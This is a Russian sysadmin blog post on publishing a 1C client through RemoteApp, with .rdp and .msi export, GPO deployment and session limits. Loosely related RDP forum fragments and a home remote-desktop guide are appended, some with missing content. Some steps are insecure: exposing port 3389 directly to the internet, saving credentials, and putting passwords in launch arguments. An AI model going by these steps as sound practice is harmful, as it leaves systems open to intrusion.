Для чего нужен RemoteAPP – это технология расширения функционала терминального сервера посредством которой можно вместо того, чтоб каждому пользователю настраивать удаленное подключение где он будет работать с приложениями (Почта, 1С, печать и другими) сделать так чтобы у него на компьютере был вынесен ярлык через который запускается удаленная сессия с запуском опубликованного приложения.

К примеру: у меня сейчас два офиса, в одном (он же главный) располагается кластер + база и терминальный сервер и вместо того, чтобы пользователи через удаленный рабочий стол заходили на терминальный сервер из другого офиса (это каждому нужно настраивать профиль: вывести ярлыки программ, организовать печать, обеспечить интернетом (а по соображениями безопасности я этого сделать не могу, просто так надо) у них на своих рабочих компьютерах настроен ярлык на запуск только опубликованного приложения. В рамках этой заметки я покажу на практике как это выглядит.

Создаю приложение которое будет опубликовано с использованием RemoteAPP на терминальном сервере:

Start – Control Panel – Administrative Tools – Server Manager – Roles – Remote Desktop Services – RemoteApp Manager (srv-host.nemdomb.local) – запускаю мастер: Add RemoteApp Programs, нажимаю Next, следующим шагом показывается какие текущие установленные приложения на терминальном сервере могут выступить в роли опубликованных через RemoteAPP, выбираю самое первое Предприятие через нажатием на кнопку Properties можно:

  • переименовать добавляемое приложение
  • Изменить путь запуска до исполняемого файла
  • Изменить алиас
  • Настроить запуск клиента 1С с опциями запуска (к примеру подключение к опеределенной базе под определенным пользователем и паролем: /ENTERPRISE /S “1ccluster\base” /N “test” /P “test” — Здесь подключение к кластеру с именем 1ccluster, base – название базы, testtest – пользователь и пароль в этой базе)

Я же в рамках этой заметки не буду настраивать ничего в свойствах, а просто выбираю приложение: —

Выбираю приложение которое будет работать через RemoteAPP

Нажимаю на кнопку Next и перехожу к этапу мастера где отображается результирующая информация по настройкам публикуемого приложения, если все правильно и ничего не нужно изменять нажимаю Finish

Следующим шагом нужно экспортировать RemoteAPP созданное приложение с целью распространить на компьютеры пользователям которые будут с ним работать , делает это так, выделяется приложение и через правый клик на нем вызываются свойства.

RemoteApp приложение можно распространять, как через rdp &.msi файлы

Опубликованное приложением можно экспортировать, как rdp файл настроенного подключение так и как msi пакет (можно поставить локально его на компьютере пользователя или же через GPO установить)

Если выбрать экспорт в виде RDP файла: Create .rdp File, по умолчанию путь куда предлагает мастер экспорта сохранить rdp файл подключения: C:\Program Files\Packaged Programs, но никто не мешает изменить данный путь на любой другое более удобный. Я оставляю по умолчанию

Каталог где располагаются файлы RemoteApp: rdp & msi

Следующим шагом также выводится результирующая информация – если все хорошо то нажимаем кнопку Finish и откроется explorer местонахождения экспортированного файла опубликованного приложения , если открыть свойства данного rdp файла, то можно обнаружить что в настройки подключения к терминальному сервере уже автоматически подставляются аутентификационные данные текущей сессии на компьютере:

Свойства подключения rdp файла опубликованного приложения

Теперь копирую данный файл: 1cv8s.rdp на рабочую станцию с которой пользователь alektest будет взаимодействовать клиентом 1С Предприятие.

На заметку: чтобы передать файл простым копирование через проводник:

\\w7x86\с$ на рабочей станции в настройках брандмауера должны быть включены входящие правила:

  • Общий доступ к файлам и принтерам (входящий трафик SMB ) – Профиль (Домен).
  • Общий доступ к файлам и принтерам (эхо-запрос – входящий трафик ICMPv4) – Профиль (Домен)

На заметку: пользователи которые задействуют RemoteAPP приложения на терминальном сервере должны быть в группе Remote Desktop Users

Запускаю на рабочей станции Windows 7 (W7X86) переданный файл предварительно авторизовавшись в системе под учетной записью alektest

Запускаю приложение RemoteAPP установленное на рабочей станции

На следующем шаге ввожу пароль на авторизацию на терминальном сервере: (Практичнее будет использовать SSO, т.е. авторизация на терминальном сервере с использование доменной учетной записи, а на терминальном сервере в группу “Пользователи удаленного рабочего стола” (Remote Desktop Users) добавить группу “Пользователи домена”).

Авторизуюсь на терминальном сервере

На заметку: если задействовать SSO то вводить ничего не придется, будет задействована доменная аутентификация без какого либо ввода пароля.

Ожидаю… Идет подключение к приложению

Идет подключение к приложению RemoteAPP

Видите, раз в приложении когда я его подготавливал для RemoteAPP я не указал базу и сервер, то первый раз когда пользователь подключается у него запускается информационное окно, что список информационных баз пуст и нужно настроить:

Настраиваю клиент 1С для работы с базой

Нажимаю “Да” — после выбираю: “Добавление в список существующей информационной базы” —

  • Укажите наименование информационной базы: zup
  • Выберите тип расположения информационной базы: На сервере 1С:Предприятия

Затем на следующем шаге указываю параметры информационной базы:

  • Кластер серверов 1С:Предприятия:10.7.8.63
  • Имя информационной базы в кластере: zup

Затем на следующем шаге все выбранное мастеров оставляю по дефолту

На этом установка клиента на подключение завершена.

В итоге будет так:

Окончательный вид настроенного клиента 1С на работу

Подключаюсь к данной базе zup нажатием на 1С:Предприятие и происходит подключение к базе путем ввода логина и пароля выданного Администратором (хотя может и Вы можете совмещать две должности вместе: системный администратор + администратор ).

Авторизуюсь в 1С

И вот вы внутри:

Я успешно авторизован в базе 1С посредством клиента 1С

Работа с клиентом на рабочем столе ничем особым не отличается если бы пользователь работал на терминальном сервере, теже самые окна, чтобы распечатать документы задействуется технология EasyPrint когда принтер с рабочей станции пробросится на терминальный сервер, и пользователь выбрав документ – печать также увидит и выбрав его распечатает.

Ниже скришот демонстрирует, открытое окно клиента и “Диспетчер задач” во вкладке “Процессы” которого присутствует подключение к терминальному серверу через (mstsc.exe).

Работа в 1С на рабочей станции отъедает всего лишь менее 20Мб оперативной памяти на компьютере

Чтобы задейстовать технологию EasyPrint и не ставить драйвера на терминальный сервер к рабочим станциям в домене предъявляются следующие требования:

Версия RDP клиента должна быть 6.1 или выше, посмотреть c:\windows\system32\mstsc.exe открыть свойства и посмотреть версию
Либо через командную строку
C:\Users\aollo>wmic datafile where name=’c:\\windows\\system32\\mstsc.exe’ get version
Version
6.1.7601.17514

Должен быть установлен .NET Framework 3.5 и выше, посмотреть что установлено в системе, так.: Открыть командную строку (c правами Администратора) и набрать следующую команду:
wmic product where «name like ‘Microsoft .NET Framework%'» get name,version

На заметку: когда пользователь закрывает нажатием на крестик (или ФайлВыход), то его сессия на терминальном сервере не закрывается, а все еще находится в состоянии подключения

Закрытая 1С у пользователя не означает что сессия завершилась

он может снова подключиться, но теперь введя пароль не забыть поставить галочку “Запомнить учетные данные” чтобы больше не видеть данное окно.

Чтобы каждый раз не вводить пароль на подключение к терминальному серверу - ставим галочку о его сохранении

Если же по каким бы то ни было причинам, пароль был введен и сохранен, а в последствии пользователь его изменил (обычно по централизованной политике раз в 3 месяца), то он не сможет подключиться, т.к. пароль запомнен изменить его можно вот так:

На рабочей станции пользователя: Windows 7 – Пуск – Панель управления – Диспетчер учетных записей, находим сохраненное подключение

Через диспетчер учетных данных пароль можно изменить на рабочей станции

Нажимаем “Изменить” — и меняем пароль поле которого выделено на представленном скрипншоте ниже:

Изменяем сохраненный пароль

Согласитель, не хорошо, что когда клиент закрыт, сессия на терминальном сервере все еще висит, в таком случае на терминальном сервере настраиваются промежутки ограничения простоя и неактивности терминального соединения:

Если сессия не активно в течении одного дня – она завершается, если в статусе Disconnected то через 15 минут она закрывается.

Ограничиваем сессия на терминальном сервере которая находится в статусе Disconnected

Если же экспортировать приложение RemoteAPP не в rdp файл, а в msi пакет, то

  • либо такжепередаем через проводник данный файл
  • либо через подготавливаем групповую политику:

GPO_RemoteAPP — Configuration — Policies — Software Settings — Software Installation — и путь в расшаренной папке до msi пакета RemoteAPP

Групповая политика на установку RemoteAPP приложения - нужен msi файл

После перезагрузки рабочей станции на рабочем столе пользователя будет ярлык

Групповая политика отработала - ярлык 1С на рабочем столе

Если ранее уже через rdp файл было настроено подключеник к базе, то когда через GPO произвели установку msi пакета найстройки подключения в клиенте уже присутствуют:

Если 1С клиент уже использовался то настройки подхватятся

У меня было что политика применилась к компьютеру, но msi все равно не устанавливалась, в логах на компьютере Windows 7 были следующие ошибки:

  • Event ID: 303 → Удаление назначения приложения 1C Предприятие из политики GPO_RemoteAPP выполнено успешно.
  • Event ID: 108 → Не удалось применить изменения для параметров установки приложения. Невозможно выполнить изменения для этого программного обеспечения. Должны существовать предшествующие записи в журнале, содержащие необходимые сведения. Ошибка: %%1612
  • Event ID: 1085Windows не удалось применить параметры «Software Installation«. Параметры «Software Installation» могут иметь свой собственный файл журнала. Щелкните ссылку «Дополнительные сведения«.

Проблема была в месте откуда в момент создать групповой политики я указывал месторасположением msi файла, у компьютера не было прав доступа в данный каталог. Права на каталог месторасположения msi файла должны быть, чтобы у группы “Прошедшие проверку” были права на чтение (Чтение и выполение,Список содержимого папки,Чтение) и только тогда msi успешно отработает.

В итоге данная заметка шпаргалка готова и подлежит публикации на моем блоге практических заметок. Всего того, что пригодится в течении рабочего дня и самостоятельного изучения, повышения свой квалификации. Итого подведу итог практических действий:

  • Развернут терминальный сервер
  • Профиля будующих пользователей вынесены на отдельный логический диск.
  • Посредством компоненты RemoteAPP и установленного ПО на сервере собраные пакеты задействующие технологию RemoteAPP для использования ПО, как будто оно установлена на рабочих местах пользователей, а все на самом деле не так, они работают в терминале. Таким образом достигается меньшая нагрузка на сеть.
  • Чтобы запускать на рабочих станциях опубликованное приложение RemoteAPP, можно раз ввести аутентификационные данные на подключение к терминальному сервере или задействовать SSO.
  • Также посредством GPO можно msi файл опубликованного приложения установить всем тем сотрудникам которые работают в программе .
  • На терминальном сервере можно централизованно по каждому профилю раскидать файл конфигурации на подключение к кластеру и соответствующей базе. Об этом будет одна из следующих заметок.

Ну а пока я прощаюсь, я и так довольно много всего рассмотрел и не зачем еще более увеличивать данную заметку. Лучше много мелких и по теме, чем все сразу. До новых встреч, с уважением автор блога – ekzorchik.

После выхода sp1 официально, обновился через центр обновлений. Обновления прошло без ошибок и т.д., но пропало меню по настройке удаленного рабочего стола и как следствие подключится к компу нет возможности.
PS. Windows 7 Максимальная 7600 RU 32-разрядная, диагностика неполадок ничего не нашла.

Решения
1. Убедитесь, что контрольная сумма дистрибутива совпадает с оригиналом. Если из системы вырезаны какие-либо компоненты, относящиеся к RDP, исправить проблему можно лишь так: переустановить Windows 7, сохранив настройки и установленные программы с оригинального диска.

2. Удалите ключ продукта, укажите новый и заново активируйте ОС. Достаточно трех команд.

Windows: Обновления для RDP-клиентов

Довольно частый вариант работы с разного рода специализированным софтом — режим терминального сервера. Он и дешевле, так как не нужно вкладываться в мощности всех ПК достаточно одного сервера, и проще в резервировании. Компания Майкрософт с постоянной периодичностью обновляет RDP-клиенты устраняя баги и добавляя новые плюшки. Так как обновления для ушедшей с поддержки Windows XP на офф. сайте уже нельзя, решил выложить все критичные обновления для большинства ОС.

Обновление для Windows XP SP2:

Обновление для Windows XP SP3:

Обновление для Windows Vista:

Для обновления клиентов Windows 7/8 нужно последовательно установить 3 обновления.

RDP клиент не подключается

Добрый день у меня на сервере запущен windows 2012R2 x64 добавлена роль терминального сервера если заходить удаленно через windows 7 x64 то все нормально работает если заходить с windows 7 x32 тогда выходит ошибка

Удаленному рабочему столу не удалось подключиться к удаленному компьютеру по одной из следующих причин.
1) Не включен удаленный доступ к серверу
2) Удаленный компьютер выключен — он включен
3) Удаленный компьютер не подключен к сети — он подключен и отлично пингуется

«Удостоверьтесь, что удаленный компьютер включен, подключен к сети и удаленный доступ к нему включен» — удостоверился.

Как подключиться к
удаленному
рабочему столу за 7
простых шагов?

Если у вас есть доступ к учетной записи администратора и к настройкам сети, вы можете выполнить всю работу самостоятельно. Эти пункты подходят для айтишников крупных компаний и для собственников малого бизнеса. Если таких разрешений у вас нет, обратитесь к сисадмину предприятия, который займется настройкой удаленного рабочего стола.

Настраиваем рабочий компьютер

1. Проверьте, установлена ли на компьютере в офисе Windows Pro. Версия не имеет значения — XP, 7, 8, 8.1 или 10. Если у вас домашняя версия, нужны сторонние программы — TeamViewer, Ammyy Admin или VNC Connect. Их установку нужно согласовывать с руководством, чтобы не нарушать корпоративную безопасность.

Второе условие подключения к удаленному рабочему столу Windows — статический или «белый» IP-адрес. В локальной сети он доступен по умолчанию, а в других случаях его нужно заказывать у провайдера. Иначе придется обратиться к сторонним приложениям: LogMeIn Hamachi, Tunngle, FreeLAN или Radmin VPN.

Удаленное подключение Windows доступно для смартфонов и планшетов. Просто скачайте приложение «Удаленный рабочий стол Microsoft» в Google Play Market или Apple App Store.

2. Войдите в учетную запись администратора и запустите панель управления в меню «Пуск». В Windows 8 нажмите правой кнопкой на логотип ОС в левом нижнем углу и выберите нужный пункт контекстного меню, чтобы не бегать глазами среди «плиток». Выберите раздел «Система», а в нем — «Подключение к удаленному рабочему столу» или «Настройка удаленного доступа». В Windows Server 2012 и более новой версии нажмите сочетание клавиш «Win+X», затем выберите пункт «Система» и вкладку «Удаленный рабочий стол». В Windows Server 2008 и старших версиях откройте меню «Пуск», вкладку «Администрирование» и приложение «Диспетчер серверов», а в нем — раздел «Удаленный рабочий стол».

3. Откройте окно и посмотрите в его нижнюю часть. Если у вас Windows 10, выбирайте пункт с подключением удаленно через интернет с проверкой подлинности на уровне сети. Если пользуетесь ранней версией операционной системы, нужно разрешить подключение с любой версией удаленного рабочего стола. Далее нажмите кнопку «Выбрать пользователей», выберите «Добавить» и укажите имя пользователя, не имеющего прав администратора. Если вы вспомнили его правильно, при нажатии кнопки «Проверить имена» к нему добавится название компьютера. Если вы знаете имя учетной записи, воспользуйтесь функцией «Поиск». При необходимости добавьте несколько пользователей.

4. Чтобы настроить удаленный рабочий стол, нужно выполнить последнюю операцию. В большинстве случаев вам придется обратиться к сисадмину — обычно только у него есть доступ к настройкам сетевого оборудования. Откройте веб-клиент или приложение для управления роутером. Найдите раздел «DHCP-сервер» и добавьте переадресацию IP.

Выберите MAC-адрес своего компьютера из выпадающего списка и закрепите за ним существующий IP-адрес. Затем перейдите в раздел «Переадресация портов» и укажите следующие параметры:

  • имя службы: rdp;
  • диапазон портов: 3389;
  • локальный адрес компьютера: выбираем тот, что закрепили ранее;
  • локальный порт: 3389;
  • протокол: TCP.

Сохраняем настройки и переходим к следующему этапу.

Подключаемся к удаленному рабочему столу из дома

5. Следующий этап — получить доступ к удаленному рабочему столу. Такая функция есть в Windows 10, 8.1, 8, Vista, 7 и XP с сервисным пакетом SP3. Для этого откройте командную строку сочетанием клавиш «Win+R» и введите команду «mstsc». Если видите ошибку, загрузите бесплатное приложение «удаленный рабочий стол» в официальном онлайн-магазине Microsoft.

6. Чтобы подключиться к удаленному рабочему столу в Windows 10 или другой версии операционной системы, укажите IP-адрес офисного компьютера в открывшемся окне. Далее введите имя учетной записи и пароль. Если вы планируете часто пользоваться удаленным доступом, поставьте галочки рядом с пунктами «Запомнить учетные данные» и «Больше не выводить запрос о подключении к этому компьютеру».

7. Основной процесс завершен. Чтобы сделать работу более удобной, в окне команды «mstsc» нажмите на стрелочку рядом с надписью «Параметры». В увеличенном окне вы увидите несколько новых вкладок. Они позволят сохранить ярлык удаленного подключения на вашем компьютере, настроить доступ к принтерам и другому периферийному оборудованию, а также организовать быстрый обмен файлами между двумя устройствами.

Чтобы отключить удаленный рабочий стол, откройте на офисном компьютере соответствующий раздел «Панели управления» и снимите галочку, разрешающую доступ. Для удаления конкретного пользователя уберите имя его учетной записи из списка.

Ссылка на основную публикацию